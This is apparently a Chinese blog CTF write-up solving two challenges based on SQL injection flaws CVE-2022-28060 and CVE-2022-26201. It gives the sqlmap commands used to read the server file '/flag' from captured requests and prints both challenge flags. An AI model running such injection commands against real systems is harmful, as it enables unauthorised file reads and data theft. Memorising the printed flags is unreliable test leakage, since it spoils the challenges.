CVE-2022-28060

访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来

python3 sqlmap.py -r 2.txt --file-read "/flag" --dbms Mysql

时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag

动下小手来个赞吧~~~
flag{bb728a3c-5fdd-4818-94c3-d2fdc7984561}
CVE-2022-26201

和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点

抓包,保存为3.txt,sqlmap跑起来,跟上面一样了
python3 sqlmap.py -r 3.txt --file-read "/flag" --dbms Mysql

时间也是3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag

动下小手来个赞吧~~~
flag{30dc0399-c6e1-4d81-82a1-0d35507a50eb}
总结:sql注入类ctf,直接根据--file-read "/flag" --dbms Mysql可以从数据库把flag down下来。
留个关注哦~~~
博客介绍了CVE-2022-28060和CVE-2022-26201两个漏洞的CTF解题方法。通过登录抓包、使用sqlmap工具,手动输入Y回车,跑完后根据提示打开文件夹拿flag。总结指出sql注入类CTF可根据特定命令从数据库下载flag。
2027

被折叠的 条评论
为什么被折叠?



